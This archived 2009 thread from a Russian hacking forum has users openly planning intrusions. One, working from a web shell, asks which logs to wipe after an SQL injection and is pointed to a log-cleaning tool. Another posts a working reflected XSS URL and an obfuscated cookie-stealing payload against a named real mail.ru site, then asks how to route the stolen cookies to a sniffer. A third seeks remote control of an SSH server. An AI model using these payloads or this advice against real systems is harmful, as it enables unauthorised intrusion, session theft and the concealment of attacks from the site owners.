ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.09.2009, 16:28
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от SeNaP
Не не хватит, тебе нужны прова рута, дя чтение и записи файлов
Ищи сплойт для подняите прав
Больше интересует 2 вопрос, про то какие логи надо подтерать
|
|
|
19.09.2009, 22:32
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Больше интересует 2 вопрос, про то какие логи надо подтерать
попробуй тулзу vanish2 , оно автоматом почистит.
|
|
|
|
20.09.2009, 11:25
|
|
Banned
Регистрация: 03.06.2009
Сообщений: 28
Провел на форуме:
82669
Репутация:
-26
|
|
Привет всем. Опять у меня вопрос. Вопрос про xss.
Нашёл xss: http://berserk.mail.ru/gallery/docs/showdoc.php?css=%22%3E%3Cscript%3Ealert(document.c ookie)%3C/script%3E%3C
Пошёл и сгенерировал на сайте http://cehennem.hut1.ru/1sdfjkfa89we7vnyr7892ny3789y12893ny489789sdy789ad8 9sj8sduisdfsdjizxcyuvxcyuzbcn73fgesy7dcg3.php
И мне вдал ссылку: [img]javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59));[/img]
Зашёл на ссылку javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59))
Мне показал мои куки.
Теперь что в ссылке изменить чтобы все посылало на сниффер, куда сувать код сниффера?
|
|
|
|
20.09.2009, 11:56
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от warlok
попробуй тулзу vanish2 , оно автоматом почистит.
Я из под WEB-шелла сижу.
Нужно почистить логи он SQL-inj тоесть от ерроров
|
|
|
|
20.09.2009, 12:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от Byrger
Я из под WEB-шелла сижу.
Нужно почистить логи он SQL-inj тоесть от ерроров
http://forum.antichat.net/threadnav49775-1-10.html
тут посмари где лежат логи и по логике ищи
|
|
|
|
20.09.2009, 12:16
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Cehennem
Привет всем. Опять у меня вопрос. Вопрос про xss.
Нашёл xss: http://berserk.mail.ru/gallery/docs/showdoc.php?css=%22%3E%3Cscript%3Ealert(document.c ookie)%3C/script%3E%3C
Пошёл и сгенерировал на сайте http://cehennem.hut1.ru/1sdfjkfa89we7vnyr7892ny3789y12893ny489789sdy789ad8 9sj8sduisdfsdjizxcyuvxcyuzbcn73fgesy7dcg3.php
И мне вдал ссылку: [img]javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59));[/img]
Зашёл на ссылку javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59))
Мне показал мои куки.
Теперь что в ссылке изменить чтобы все посылало на сниффер, куда сувать код сниффера?
На ачате уже много раз обсуждалось. Создавай картинку с помощью js.
Последний раз редактировалось mailbrush; 20.09.2009 в 12:18..
|
|
|
|
20.09.2009, 12:19
|
|
Banned
Регистрация: 03.06.2009
Сообщений: 28
Провел на форуме:
82669
Репутация:
-26
|
|
mailbrush я не понял? Можешь вделить то место на коде javascripta, куда нужно поставить код сниффера или сам постав код сниффера, а я сам догадаюсь уже.
|
|
|
|
20.09.2009, 14:23
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Это краткое описание уязвимостей php.
|
|
|
|
20.09.2009, 15:19
|
|
Banned
Регистрация: 03.06.2009
Сообщений: 28
Провел на форуме:
82669
Репутация:
-26
|
|
Сообщение от mailbrush
Сообщение от Cehennem
Привет всем. Опять у меня вопрос. Вопрос про xss.
Нашёл xss: http://berserk.mail.ru/gallery/docs/showdoc.php?css=%22%3E%3Cscript%3Ealert(document.c ookie)%3C/script%3E%3C
Пошёл и сгенерировал на сайте http://cehennem.hut1.ru/1sdfjkfa89we7vnyr7892ny3789y12893ny489789sdy789ad8 9sj8sduisdfsdjizxcyuvxcyuzbcn73fgesy7dcg3.php
И мне вдал ссылку: [img]javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59));[/img]
Зашёл на ссылку javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59))
Мне показал мои куки.
Теперь что в ссылке изменить чтобы все посылало на сниффер, куда сувать код сниффера?
Ну никто не ответит? Я знаю что для вас не трудно. Если не помешает поставьте из любого сниффера код в javascript xss, а потом я пойму.
плизззззззззз
|
|
|
|
20.09.2009, 17:21
|
|
Новичок
Регистрация: 22.05.2009
Сообщений: 1
Провел на форуме:
28502
Репутация:
0
|
|
Есть удаленный хост с открым 22 портом. На нем висит SSH2.0-OpenSSH_4.3. Хотелось бы найти возможность удаленно управлять. Искал на милворм, нашел только на Denial, да и он не сработал... Испытывал на cygwin.
Есть еще варианты?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
